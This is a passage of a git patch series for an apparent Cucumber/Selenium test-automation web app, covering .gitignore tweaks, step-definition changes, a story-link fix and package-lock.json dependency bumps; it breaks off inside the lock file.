From 4429d761025a90727ae14da2f74b36937dfc189b Mon Sep 17 00:00:00 2001 From: Daniel Sorna Date: Thu, 22 Jul 2021 14:24:21 +0200 Subject: [PATCH 01/50] added custom download directory --- backend/.gitignore | 9 +++++---- backend/features/step_definitions/stepdefs.js | 3 +++ 2 files changed, 8 insertions(+), 4 deletions(-) diff --git a/backend/.gitignore b/backend/.gitignore index 323eca7e5..f5077e1d0 100644 --- a/backend/.gitignore +++ b/backend/.gitignore @@ -33,13 +33,14 @@ npm-debug.log yarn-error.log testem.log /typings -.feature -/features/*.json -/features/*.html + +/features/* +!/features/step_definitions/* + # System Files .DS_Store Thumbs.db #Db Backup dbbackups/ -features/Group_Nr. + diff --git a/backend/features/step_definitions/stepdefs.js b/backend/features/step_definitions/stepdefs.js index 35bdf2f84..e70917bff 100644 --- a/backend/features/step_definitions/stepdefs.js +++ b/backend/features/step_definitions/stepdefs.js @@ -21,6 +21,9 @@ chromeOptions.addArguments('--ignore-certificate-errors'); chromeOptions.addArguments('--start-maximized'); chromeOptions.addArguments('--lang=de'); // chromeOptions.addArguments('--start-fullscreen'); + +chromeOptions.setUserPreferences({ 'download.default_directory': 'C:\\Users\\Public\\seed_Downloads' }); + chromeOptions.bynary_location = process.env.GOOGLE_CHROME_SHIM; let currentParameters = {}; From 31f04a2384efc6c88c40fb7a35a3662de4dde445 Mon Sep 17 00:00:00 2001 From: Daniel Sorna Date: Tue, 14 Sep 2021 17:15:08 +0200 Subject: [PATCH 02/50] added exception for "Alte Sitzung Beenden" ++ adding "https://" before Story-Link so it works in firefox --- backend/features/step_definitions/stepdefs.js | 9 +++++++++ frontend/src/app/story-editor/story-editor.component.ts | 2 +- 2 files changed, 10 insertions(+), 1 deletion(-) diff --git a/backend/features/step_definitions/stepdefs.js b/backend/features/step_definitions/stepdefs.js index 7aafee644..f2c581e52 100644 --- a/backend/features/step_definitions/stepdefs.js +++ b/backend/features/step_definitions/stepdefs.js @@ -170,6 +170,15 @@ When('I click the button: {string}', async function clickButton(button) { const world = this; await driver.getCurrentUrl() .then(async (currentUrl) => { + // for DAISY only: don't throw an error and end the testcase if "Alte Sitzung Beenden" is not found + if (button === 'Alte Sitzung beenden') { + try { + await driver.wait(until.elementLocated(By.xpath(`//*[@name='kill-session']`)), 3 * 1000).click(); + } catch (e) { + console.log('Button "Alte Sitzung beenden" not found. Skipping the Step...'); + } + return; + } // prevent Button click on "Run Story" or "Run Scenario" to prevent recursion if ((currentUrl === 'http://localhost:4200/' || currentUrl === 'https://seed-test-frontend.herokuapp.com/') && button.toLowerCase() .match(/^run[ _](story|scenario)$/) !== null) throw new Error('Executing Seed-Test inside a scenario is not allowed, to prevent recursion!'); diff --git a/frontend/src/app/story-editor/story-editor.component.ts b/frontend/src/app/story-editor/story-editor.component.ts index 90db4fea0..7e620ac5a 100644 --- a/frontend/src/app/story-editor/story-editor.component.ts +++ b/frontend/src/app/story-editor/story-editor.component.ts @@ -916,7 +916,7 @@ export class StoryEditorComponent implements OnInit, DoCheck { } storyLink() { - return window.location.hostname + ':' + window.location.port + '/story/' + this.selectedStory._id; + return 'https://'+ window.location.hostname + ':' + window.location.port + '/story/' + this.selectedStory._id; } showStoryLinkToast() { this.toastr.success('', 'Successfully added Link to Clipboard!'); From 0ce1f8240277b269e32244ad2eea3b43fe0732a1 Mon Sep 17 00:00:00 2001 From: Daniel Sorna Date: Wed, 24 Nov 2021 10:49:44 +0100 Subject: [PATCH 03/50] update version --- frontend/src/app/app.component.html | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/frontend/src/app/app.component.html b/frontend/src/app/app.component.html index 6c01307a9..bf17de634 100644 --- a/frontend/src/app/app.component.html +++ b/frontend/src/app/app.component.html @@ -3,7 +3,7 @@ From 4e6f9ce0394ed63612c82a3da76df8aca8ae1745 Mon Sep 17 00:00:00 2001 From: Daniel Sorna Date: Wed, 24 Nov 2021 11:31:49 +0100 Subject: [PATCH 04/50] remove parallel execution for daisy --- backend/src/serverHelper.js | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) diff --git a/backend/src/serverHelper.js b/backend/src/serverHelper.js index 96fc7b179..16f73df4d 100644 --- a/backend/src/serverHelper.js +++ b/backend/src/serverHelper.js @@ -540,17 +540,17 @@ async function execReport(req, res, stories, mode, parameters, callback) { for (const story of stories) { await nameSchemeChange(story); // if mit execution mode "parallel" or "sequential" - if (parameters.isSequential !== undefined && parameters.isSequential) { - await executeTest(req, res, stories, mode, story) - .then((values) => { - callback(values); - }); - } else { - executeTest(req, res, stories, mode, story) - .then((values) => { - callback(values); - }); - } + // if (parameters.isSequential !== undefined && parameters.isSequential) { + await executeTest(req, res, stories, mode, story) + .then((values) => { + callback(values); + }); + // } else { + // executeTest(req, res, stories, mode, story) + // .then((values) => { + // callback(values); + // }); + // } } } else { const story = await mongo.getOneStory(req.params.issueID, req.params.storySource); From 82456e452ae74caf90038bc45deb491bec760207 Mon Sep 17 00:00:00 2001 From: Daniel Sorna Date: Tue, 22 Feb 2022 15:59:19 +0100 Subject: [PATCH 05/50] minor update + bug fix on scenarioID --- .gitignore | 23 +- backend/package-lock.json | 592 +-- backend/src/database/mongodatabase.js | 10 +- frontend/package-lock.json | 4738 +++++++++++++++---------- 4 files changed, 3268 insertions(+), 2095 deletions(-) diff --git a/.gitignore b/.gitignore index 29939aec1..1bb35fe88 100644 --- a/.gitignore +++ b/.gitignore @@ -25,10 +25,9 @@ heroku_push.bat *.sublime-workspace frontend/.idea backend/.idea - -# IDE - VSCode .vscode/* + # misc /.sass-cache /connect.lock @@ -43,6 +42,7 @@ testem.log .env environment.prod.ts envrionment.ts +frontend/src/environments/environment.ts # System Files .DS_Store @@ -51,31 +51,23 @@ Thumbs.db frontend/documentation frontend/coverage frontend/\.editorconfig +frontend/.angular frontend/dist/cucumber-frontend/3rdpartylicenses\.txt - frontend/dist/cucumber-frontend/assets/adesso-logo\.jpg - frontend/dist/cucumber-frontend/favicon\.ico - frontend/dist/cucumber-frontend/index\.html - frontend/dist/cucumber-frontend/main\.e9313b2cc4f34e15a426\.js - frontend/dist/cucumber-frontend/polyfills\.f6ae3e8b63939c618130\.js - frontend/dist/cucumber-frontend/runtime\.06daa30a2963fa413676\.js - frontend/dist/cucumber-frontend/scripts\.1783ec7bceeab4026a81\.js - frontend/dist/cucumber-frontend/styles\.929c34a151987d4e0622\.css +# Lints .eslintrc.json - tslint.json -frontend/src/environments/environment.ts - +# Coerage & Code Analysis frontend/src/coverage/ sonar-project.properties .scannerwork @@ -88,14 +80,11 @@ backend/features/reporting_html*.html # Batches for install, update and start *.bat *.sh +*.ps1 # local testing for step-definition development backend/features/step_definitions/testing.js -*.sh -*.ps1 - # Website Deployment with IIS **/web.config /website -*.bat diff --git a/backend/package-lock.json b/backend/package-lock.json index d49a8bd16..eac6201d7 100644 --- a/backend/package-lock.json +++ b/backend/package-lock.json @@ -573,6 +573,15 @@ "url": "https://github.com/sindresorhus/is?sponsor=1" } }, + "node_modules/@socket.io/base64-arraybuffer": { + "version": "1.0.2", + "resolved": "https://registry.npmjs.org/@socket.io/base64-arraybuffer/-/base64-arraybuffer-1.0.2.tgz", + "integrity": "sha512-dOlCBKnDw4iShaIsH/bxujKTM18+2TOAsYz+KSc11Am38H4q5Xw8Bbz97ZYdrVNM+um3p7w86Bvvmcn9q+5+eQ==", + "dev": true, + "engines": { + "node": ">= 0.6.0" + } + }, "node_modules/@szmarczak/http-timer": { "version": "4.0.6", "resolved": "https://registry.npmjs.org/@szmarczak/http-timer/-/http-timer-4.0.6.tgz", @@ -596,21 +605,21 @@ } }, "node_modules/@types/component-emitter": { - "version": "1.2.10", - "resolved": "https://registry.npmjs.org/@types/component-emitter/-/component-emitter-1.2.10.tgz", - "integrity": "sha512-bsjleuRKWmGqajMerkzox19aGbscQX5rmmvvXl3wlIp5gMG1HgkiwPxsN5p070fBDKTNSPgojVbuY1+HWMbFhg==", + "version": "1.2.11", + "resolved": "https://registry.npmjs.org/@types/component-emitter/-/component-emitter-1.2.11.tgz", + "integrity": "sha512-SRXjM+tfsSlA9VuG8hGO2nft2p8zjXCK1VcC6N4NXbBbYbSia9kzCChYQajIjzIqOOOuh5Ock6MmV2oux4jDZQ==", "dev": true }, "node_modules/@types/cookie": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/@types/cookie/-/cookie-0.4.0.tgz", - "integrity": "sha512-y7mImlc/rNkvCRmg8gC3/lj87S7pTUIJ6QGjwHR9WQJcFs+ZMTOaoPrkdFA/YdbuqVEmEbb5RdhVxMkAcgOnpg==", + "version": "0.4.1", + "resolved": "https://registry.npmjs.org/@types/cookie/-/cookie-0.4.1.tgz", + "integrity": "sha512-XW/Aa8APYr6jSVVA1y/DEIZX0/GMKLEVekNG727R8cs56ahETkRAy/3DR7+fJyh7oUgGwNQaRfXCun0+KbWY7Q==", "dev": true }, "node_modules/@types/cors": { - "version": "2.8.10", - "resolved": "https://registry.npmjs.org/@types/cors/-/cors-2.8.10.tgz", - "integrity": "sha512-C7srjHiVG3Ey1nR6d511dtDkCEjxuN9W1HWAEjGq8kpcwmNM6JJkpC0xvabM7BXTG2wDq8Eu33iH9aQKa7IvLQ==", + "version": "2.8.12", + "resolved": "https://registry.npmjs.org/@types/cors/-/cors-2.8.12.tgz", + "integrity": "sha512-vt+kDhq/M2ayberEtJcIN/hxXy1Pk+59g2FV/ZQceeaTyCtCucjL2Q7FXlFjtWn4n15KCr1NE2lNNFhp0lEThw==", "dev": true }, "node_modules/@types/http-cache-semantics": { @@ -1077,15 +1086,6 @@ "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.0.tgz", "integrity": "sha1-ibTRmasr7kneFk6gK4nORi1xt2c=" }, - "node_modules/base64-arraybuffer": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/base64-arraybuffer/-/base64-arraybuffer-0.1.4.tgz", - "integrity": "sha1-mBjHngWbE1X5fgQooBfIOOkLqBI=", - "dev": true, - "engines": { - "node": ">= 0.6.0" - } - }, "node_modules/base64id": { "version": "2.0.0", "resolved": "https://registry.npmjs.org/base64id/-/base64id-2.0.0.tgz", @@ -1547,6 +1547,12 @@ "resolved": "https://registry.npmjs.org/commander/-/commander-2.20.3.tgz", "integrity": "sha512-GpVkmM8vF2vQUkj2LvZmD35JxeJOLCwJ9cUkugyk2nuhbv3+mJvpLYYt+0+USMxE+oj+ey/lJEnhZw75x/OMcQ==" }, + "node_modules/component-emitter": { + "version": "1.3.0", + "resolved": "https://registry.npmjs.org/component-emitter/-/component-emitter-1.3.0.tgz", + "integrity": "sha512-Rd3se6QB+sO1TwqZjscQrurpEPIfO0/yYnSin6Q/rD3mOutHvUrCAhJub3r90uNb+SESBuE0QYoB90YdfatsRg==", + "dev": true + }, "node_modules/concat-map": { "version": "0.0.1", "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", @@ -1775,9 +1781,9 @@ } }, "node_modules/date-format": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/date-format/-/date-format-3.0.0.tgz", - "integrity": "sha512-eyTcpKOcamdhWJXj56DpQMo1ylSQpcGtGKXcU0Tb97+K56/CF5amAqqqNj0+KvA0iw2ynxtHWFsPDSClCxe48w==", + "version": "4.0.3", + "resolved": "https://registry.npmjs.org/date-format/-/date-format-4.0.3.tgz", + "integrity": "sha512-7P3FyqDcfeznLZp2b+OMitV9Sz2lUnsT87WaTat9nVwqsBkTzPG3lPLNwW3en6F4pHUiWzr6vb8CLhjdK9bcxQ==", "dev": true, "engines": { "node": ">=4.0" @@ -2276,39 +2282,42 @@ } }, "node_modules/engine.io": { - "version": "4.1.1", - "resolved": "https://registry.npmjs.org/engine.io/-/engine.io-4.1.1.tgz", - "integrity": "sha512-t2E9wLlssQjGw0nluF6aYyfX8LwYU8Jj0xct+pAhfWfv/YrBn6TSNtEYsgxHIfaMqfrLx07czcMg9bMN6di+3w==", + "version": "6.1.2", + "resolved": "https://registry.npmjs.org/engine.io/-/engine.io-6.1.2.tgz", + "integrity": "sha512-v/7eGHxPvO2AWsksyx2PUsQvBafuvqs0jJJQ0FdmJG1b9qIvgSbqDRGwNhfk2XHaTTbTXiC4quRE8Q9nRjsrQQ==", "dev": true, "dependencies": { + "@types/cookie": "^0.4.1", + "@types/cors": "^2.8.12", + "@types/node": ">=10.0.0", "accepts": "~1.3.4", "base64id": "2.0.0", "cookie": "~0.4.1", "cors": "~2.8.5", "debug": "~4.3.1", - "engine.io-parser": "~4.0.0", - "ws": "~7.4.2" + "engine.io-parser": "~5.0.0", + "ws": "~8.2.3" }, "engines": { "node": ">=10.0.0" } }, "node_modules/engine.io-parser": { - "version": "4.0.2", - "resolved": "https://registry.npmjs.org/engine.io-parser/-/engine.io-parser-4.0.2.tgz", - "integrity": "sha512-sHfEQv6nmtJrq6TKuIz5kyEKH/qSdK56H/A+7DnAuUPWosnIZAS2NHNcPLmyjtY3cGS/MqJdZbUjW97JU72iYg==", + "version": "5.0.3", + "resolved": "https://registry.npmjs.org/engine.io-parser/-/engine.io-parser-5.0.3.tgz", + "integrity": "sha512-BtQxwF27XUNnSafQLvDi0dQ8s3i6VgzSoQMJacpIcGNrlUdfHSKbgm3jmjCVvQluGzqwujQMPAoMai3oYSTurg==", "dev": true, "dependencies": { - "base64-arraybuffer": "0.1.4" + "@socket.io/base64-arraybuffer": "~1.0.2" }, "engines": { - "node": ">=8.0.0" + "node": ">=10.0.0" } }, "node_modules/engine.io/node_modules/debug": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.1.tgz", - "integrity": "sha512-doEwdvm4PCeK4K3RQN2ZC2BYUBaxwLARCqZmMjtF8a51J2Rb0xpVloFRnCODwqjpwnAoao4pelN8l3RJdv3gRQ==", + "version": "4.3.3", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.3.tgz", + "integrity": "sha512-/zxw5+vh1Tfv+4Qn7a5nsbcJKPaSvCDhojn6FEl9vupwK2VCSDtEiEtqr8DFtzYFOdz63LBkxec7DYuc2jon6Q==", "dev": true, "dependencies": { "ms": "2.1.2" @@ -2328,27 +2337,6 @@ "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", "dev": true }, - "node_modules/engine.io/node_modules/ws": { - "version": "7.4.6", - "resolved": "https://registry.npmjs.org/ws/-/ws-7.4.6.tgz", - "integrity": "sha512-YmhHDO4MzaDLB+M9ym/mDA5z0naX8j7SIlT8f8z+I0VtzsRbekxEutHSme7NPS2qE8StCYQNUnfWdXta/Yu85A==", - "dev": true, - "engines": { - "node": ">=8.3.0" - }, - "peerDependencies": { - "bufferutil": "^4.0.1", - "utf-8-validate": "^5.0.2" - }, - "peerDependenciesMeta": { - "bufferutil": { - "optional": true - }, - "utf-8-validate": { - "optional": true - } - } - }, "node_modules/enquirer": { "version": "2.3.6", "resolved": "https://registry.npmjs.org/enquirer/-/enquirer-2.3.6.tgz", @@ -3306,23 +3294,16 @@ "node": "^10.12.0 || >=12.0.0" } }, - "node_modules/flat-cache/node_modules/flatted": { - "version": "3.2.2", - "resolved": "https://registry.npmjs.org/flatted/-/flatted-3.2.2.tgz", - "integrity": "sha512-JaTY/wtrcSyvXJl4IMFHPKyFur1sE9AUqc0QnhOaJ0CxHtAoIV8pYDzeEfAaNEtGkOfq4gr3LBFmdXW5mOQFnA==", - "dev": true, - "peer": true - }, "node_modules/flatted": { - "version": "2.0.2", - "resolved": "https://registry.npmjs.org/flatted/-/flatted-2.0.2.tgz", - "integrity": "sha512-r5wGx7YeOwNWNlCA0wQ86zKyDLMQr+/RB8xy74M4hTphfmjlijTSSXGuH8rnvKZnfT9i+75zmd8jcKdMR4O6jA==", + "version": "3.2.5", + "resolved": "https://registry.npmjs.org/flatted/-/flatted-3.2.5.tgz", + "integrity": "sha512-WIWGi2L3DyTUvUrwRKgGi9TwxQMUEqPOPQBVi71R96jZXJdFskXEmf54BoZaS1kknGODoIGASGEzBUYdyMCBJg==", "dev": true }, "node_modules/follow-redirects": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.14.1.tgz", - "integrity": "sha512-HWqDgT7ZEkqRzBvc2s64vSZ/hfOceEol3ac/7tKwzuvEyWx3/4UegXh5oBOIotkGsObyk3xznnSRVADBgWSQVg==", + "version": "1.14.9", + "resolved": "https://registry.npmjs.org/follow-redirects/-/follow-redirects-1.14.9.tgz", + "integrity": "sha512-MQDfihBQYMcyy5dhRDJUHcw7lb2Pv/TuE6xP1vyraLukNDHKbDxDNaOE3NbCAdKQApno+GPRyo1YAp89yCjK4w==", "dev": true, "funding": [ { @@ -4564,9 +4545,9 @@ "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==" }, "node_modules/json-schema": { - "version": "0.2.3", - "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.2.3.tgz", - "integrity": "sha1-tIDIkuWaLwWVTOcnvT8qTogvnhM=" + "version": "0.4.0", + "resolved": "https://registry.npmjs.org/json-schema/-/json-schema-0.4.0.tgz", + "integrity": "sha512-es94M3nTIfsEPisRafak+HDLfHXnKBhV3vU5eqPcS3flIWqcxJWgXHXiey3YrpaNsanY5ei1VoYEbOzijuq9BA==" }, "node_modules/json-schema-traverse": { "version": "0.4.1", @@ -4609,17 +4590,17 @@ } }, "node_modules/jsprim": { - "version": "1.4.1", - "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.1.tgz", - "integrity": "sha1-MT5mvB5cwG5Di8G3SZwuXFastqI=", - "engines": [ - "node >=0.6.0" - ], + "version": "1.4.2", + "resolved": "https://registry.npmjs.org/jsprim/-/jsprim-1.4.2.tgz", + "integrity": "sha512-P2bSOMAc/ciLz6DzgjVlGJP9+BrJWu5UDGK70C2iweC5QBIeFf0ZXRvGjEj2uYgrY2MkAAhsSWHDWlFtEroZWw==", "dependencies": { "assert-plus": "1.0.0", "extsprintf": "1.3.0", - "json-schema": "0.2.3", + "json-schema": "0.4.0", "verror": "1.10.0" + }, + "engines": { + "node": ">=0.6.0" } }, "node_modules/jszip": { @@ -4634,15 +4615,15 @@ } }, "node_modules/karma": { - "version": "6.3.4", - "resolved": "https://registry.npmjs.org/karma/-/karma-6.3.4.tgz", - "integrity": "sha512-hbhRogUYIulfkBTZT7xoPrCYhRBnBoqbbL4fszWD0ReFGUxU+LYBr3dwKdAluaDQ/ynT9/7C+Lf7pPNW4gSx4Q==", + "version": "6.3.16", + "resolved": "https://registry.npmjs.org/karma/-/karma-6.3.16.tgz", + "integrity": "sha512-nEU50jLvDe5yvXqkEJRf8IuvddUkOY2x5Xc4WXHz6dxINgGDrgD2uqQWeVrJs4hbfNaotn+HQ1LZJ4yOXrL7xQ==", "dev": true, "dependencies": { "body-parser": "^1.19.0", "braces": "^3.0.2", "chokidar": "^3.5.1", - "colors": "^1.4.0", + "colors": "1.4.0", "connect": "^3.7.0", "di": "^0.0.1", "dom-serialize": "^2.2.1", @@ -4651,16 +4632,17 @@ "http-proxy": "^1.18.1", "isbinaryfile": "^4.0.8", "lodash": "^4.17.21", - "log4js": "^6.3.0", + "log4js": "^6.4.1", "mime": "^2.5.2", "minimatch": "^3.0.4", + "mkdirp": "^0.5.5", "qjobs": "^1.2.0", "range-parser": "^1.2.1", "rimraf": "^3.0.2", - "socket.io": "^3.1.0", + "socket.io": "^4.2.0", "source-map": "^0.6.1", "tmp": "^0.2.1", - "ua-parser-js": "^0.7.28", + "ua-parser-js": "^0.7.30", "yargs": "^16.1.1" }, "bin": { @@ -4959,25 +4941,25 @@ "integrity": "sha1-JMS/zWsvuji/0FlNsRedjptlZWE=" }, "node_modules/log4js": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/log4js/-/log4js-6.3.0.tgz", - "integrity": "sha512-Mc8jNuSFImQUIateBFwdOQcmC6Q5maU0VVvdC2R6XMb66/VnT+7WS4D/0EeNMZu1YODmJe5NIn2XftCzEocUgw==", + "version": "6.4.1", + "resolved": "https://registry.npmjs.org/log4js/-/log4js-6.4.1.tgz", + "integrity": "sha512-iUiYnXqAmNKiIZ1XSAitQ4TmNs8CdZYTAWINARF3LjnsLN8tY5m0vRwd6uuWj/yNY0YHxeZodnbmxKFUOM2rMg==", "dev": true, "dependencies": { - "date-format": "^3.0.0", - "debug": "^4.1.1", - "flatted": "^2.0.1", - "rfdc": "^1.1.4", - "streamroller": "^2.2.4" + "date-format": "^4.0.3", + "debug": "^4.3.3", + "flatted": "^3.2.4", + "rfdc": "^1.3.0", + "streamroller": "^3.0.2" }, "engines": { "node": ">=8.0" } }, "node_modules/log4js/node_modules/debug": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.1.tgz", - "integrity": "sha512-doEwdvm4PCeK4K3RQN2ZC2BYUBaxwLARCqZmMjtF8a51J2Rb0xpVloFRnCODwqjpwnAoao4pelN8l3RJdv3gRQ==", + "version": "4.3.3", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.3.tgz", + "integrity": "sha512-/zxw5+vh1Tfv+4Qn7a5nsbcJKPaSvCDhojn6FEl9vupwK2VCSDtEiEtqr8DFtzYFOdz63LBkxec7DYuc2jon6Q==", "dev": true, "dependencies": { "ms": "2.1.2" @@ -5425,6 +5407,18 @@ "node": ">= 8" } }, + "node_modules/mkdirp": { + "version": "0.5.5", + "resolved": "https://registry.npmjs.org/mkdirp/-/mkdirp-0.5.5.tgz", + "integrity": "sha512-NKmAlESf6jMGym1++R0Ra7wvhV+wFW63FaSOFPwRahvea0gMUcGUhVeAg/0BC0wiv9ih5NYPB1Wn1UEI1/L+xQ==", + "dev": true, + "dependencies": { + "minimist": "^1.2.5" + }, + "bin": { + "mkdirp": "bin/cmd.js" + } + }, "node_modules/mongodb": { "version": "3.7.2", "resolved": "https://registry.npmjs.org/mongodb/-/mongodb-3.7.2.tgz", @@ -5521,9 +5515,9 @@ "integrity": "sha512-M2ufzIiINKCuDfBSAUr1vWQ+vuVcA9kqx8JJUsbQi6yf1uGRyb7HfpdfUr5qLXf3B/t8dPvcjhKMmlfnP47EzQ==" }, "node_modules/nanoid": { - "version": "3.1.30", - "resolved": "https://registry.npmjs.org/nanoid/-/nanoid-3.1.30.tgz", - "integrity": "sha512-zJpuPDwOv8D2zq2WRoMe1HsfZthVewpel9CAvTfc/2mBD1uUT/agc5f7GHGWXlYkFvi1mVxe4IjvP2HNrop7nQ==", + "version": "3.3.1", + "resolved": "https://registry.npmjs.org/nanoid/-/nanoid-3.3.1.tgz", + "integrity": "sha512-n6Vs/3KGyxPQd6uO0eH4Bv0ojGSUvuLlIHtC3Y0kEO23YRge8H9x1GCzLn28YX0H66pMkxuaeESFq4tKISKwdw==", "dev": true, "bin": { "nanoid": "bin/nanoid.cjs" @@ -5580,14 +5574,22 @@ } }, "node_modules/node-fetch": { - "version": "2.6.5", - "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.6.5.tgz", - "integrity": "sha512-mmlIVHJEu5rnIxgEgez6b9GgWXbkZj5YZ7fx+2r94a2E+Uirsp6HsPTPlomfdHtpt/B0cdKviwkoaM6pyvUOpQ==", + "version": "2.6.7", + "resolved": "https://registry.npmjs.org/node-fetch/-/node-fetch-2.6.7.tgz", + "integrity": "sha512-ZjMPFEfVx5j+y2yF35Kzx5sF7kDzxuDj6ziH4FFbOp87zKDZNx8yExJIb05OGF4Nlt9IHFIMBkRl41VdvcNdbQ==", "dependencies": { "whatwg-url": "^5.0.0" }, "engines": { "node": "4.x || >=6.0.0" + }, + "peerDependencies": { + "encoding": "^0.1.0" + }, + "peerDependenciesMeta": { + "encoding": { + "optional": true + } } }, "node_modules/node-gyp": { @@ -6775,29 +6777,26 @@ "integrity": "sha1-tf3AjxKH6hF4Yo5BXiUTK3NkbG0=" }, "node_modules/socket.io": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/socket.io/-/socket.io-3.1.2.tgz", - "integrity": "sha512-JubKZnTQ4Z8G4IZWtaAZSiRP3I/inpy8c/Bsx2jrwGrTbKeVU5xd6qkKMHpChYeM3dWZSO0QACiGK+obhBNwYw==", + "version": "4.4.1", + "resolved": "https://registry.npmjs.org/socket.io/-/socket.io-4.4.1.tgz", + "integrity": "sha512-s04vrBswdQBUmuWJuuNTmXUVJhP0cVky8bBDhdkf8y0Ptsu7fKU2LuLbts9g+pdmAdyMMn8F/9Mf1/wbtUN0fg==", "dev": true, "dependencies": { - "@types/cookie": "^0.4.0", - "@types/cors": "^2.8.8", - "@types/node": ">=10.0.0", "accepts": "~1.3.4", "base64id": "~2.0.0", - "debug": "~4.3.1", - "engine.io": "~4.1.0", - "socket.io-adapter": "~2.1.0", - "socket.io-parser": "~4.0.3" + "debug": "~4.3.2", + "engine.io": "~6.1.0", + "socket.io-adapter": "~2.3.3", + "socket.io-parser": "~4.0.4" }, "engines": { "node": ">=10.0.0" } }, "node_modules/socket.io-adapter": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/socket.io-adapter/-/socket.io-adapter-2.1.0.tgz", - "integrity": "sha512-+vDov/aTsLjViYTwS9fPy5pEtTkrbEKsw2M+oVSoFGw6OD1IpvlV1VPhUzNbofCQ8oyMbdYJqDtGdmHQK6TdPg==", + "version": "2.3.3", + "resolved": "https://registry.npmjs.org/socket.io-adapter/-/socket.io-adapter-2.3.3.tgz", + "integrity": "sha512-Qd/iwn3VskrpNO60BeRyCyr8ZWw9CPZyitW4AQwmRZ8zCiyDiL+znRnWX6tDHXnWn1sJrM1+b6Mn6wEDJJ4aYQ==", "dev": true }, "node_modules/socket.io-parser": { @@ -6814,16 +6813,10 @@ "node": ">=10.0.0" } }, - "node_modules/socket.io-parser/node_modules/component-emitter": { - "version": "1.3.0", - "resolved": "https://registry.npmjs.org/component-emitter/-/component-emitter-1.3.0.tgz", - "integrity": "sha512-Rd3se6QB+sO1TwqZjscQrurpEPIfO0/yYnSin6Q/rD3mOutHvUrCAhJub3r90uNb+SESBuE0QYoB90YdfatsRg==", - "dev": true - }, "node_modules/socket.io-parser/node_modules/debug": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.1.tgz", - "integrity": "sha512-doEwdvm4PCeK4K3RQN2ZC2BYUBaxwLARCqZmMjtF8a51J2Rb0xpVloFRnCODwqjpwnAoao4pelN8l3RJdv3gRQ==", + "version": "4.3.3", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.3.tgz", + "integrity": "sha512-/zxw5+vh1Tfv+4Qn7a5nsbcJKPaSvCDhojn6FEl9vupwK2VCSDtEiEtqr8DFtzYFOdz63LBkxec7DYuc2jon6Q==", "dev": true, "dependencies": { "ms": "2.1.2" @@ -6844,9 +6837,9 @@ "dev": true }, "node_modules/socket.io/node_modules/debug": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.1.tgz", - "integrity": "sha512-doEwdvm4PCeK4K3RQN2ZC2BYUBaxwLARCqZmMjtF8a51J2Rb0xpVloFRnCODwqjpwnAoao4pelN8l3RJdv3gRQ==", + "version": "4.3.3", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.3.tgz", + "integrity": "sha512-/zxw5+vh1Tfv+4Qn7a5nsbcJKPaSvCDhojn6FEl9vupwK2VCSDtEiEtqr8DFtzYFOdz63LBkxec7DYuc2jon6Q==", "dev": true, "dependencies": { "ms": "2.1.2" @@ -7020,32 +7013,23 @@ } }, "node_modules/streamroller": { - "version": "2.2.4", - "resolved": "https://registry.npmjs.org/streamroller/-/streamroller-2.2.4.tgz", - "integrity": "sha512-OG79qm3AujAM9ImoqgWEY1xG4HX+Lw+yY6qZj9R1K2mhF5bEmQ849wvrb+4vt4jLMLzwXttJlQbOdPOQVRv7DQ==", + "version": "3.0.2", + "resolved": "https://registry.npmjs.org/streamroller/-/streamroller-3.0.2.tgz", + "integrity": "sha512-ur6y5S5dopOaRXBuRIZ1u6GC5bcEXHRZKgfBjfCglMhmIf+roVCECjvkEYzNQOXIN2/JPnkMPW/8B3CZoKaEPA==", "dev": true, "dependencies": { - "date-format": "^2.1.0", + "date-format": "^4.0.3", "debug": "^4.1.1", - "fs-extra": "^8.1.0" + "fs-extra": "^10.0.0" }, "engines": { "node": ">=8.0" } }, - "node_modules/streamroller/node_modules/date-format": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/date-format/-/date-format-2.1.0.tgz", - "integrity": "sha512-bYQuGLeFxhkxNOF3rcMtiZxvCBAquGzZm6oWA1oZ0g2THUzivaRhv8uOhdr19LmoobSOLoIAxeUK2RdbM8IFTA==", - "dev": true, - "engines": { - "node": ">=4.0" - } - }, "node_modules/streamroller/node_modules/debug": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.1.tgz", - "integrity": "sha512-doEwdvm4PCeK4K3RQN2ZC2BYUBaxwLARCqZmMjtF8a51J2Rb0xpVloFRnCODwqjpwnAoao4pelN8l3RJdv3gRQ==", + "version": "4.3.3", + "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.3.tgz", + "integrity": "sha512-/zxw5+vh1Tfv+4Qn7a5nsbcJKPaSvCDhojn6FEl9vupwK2VCSDtEiEtqr8DFtzYFOdz63LBkxec7DYuc2jon6Q==", "dev": true, "dependencies": { "ms": "2.1.2" @@ -7059,12 +7043,47 @@ } } }, + "node_modules/streamroller/node_modules/fs-extra": { + "version": "10.0.0", + "resolved": 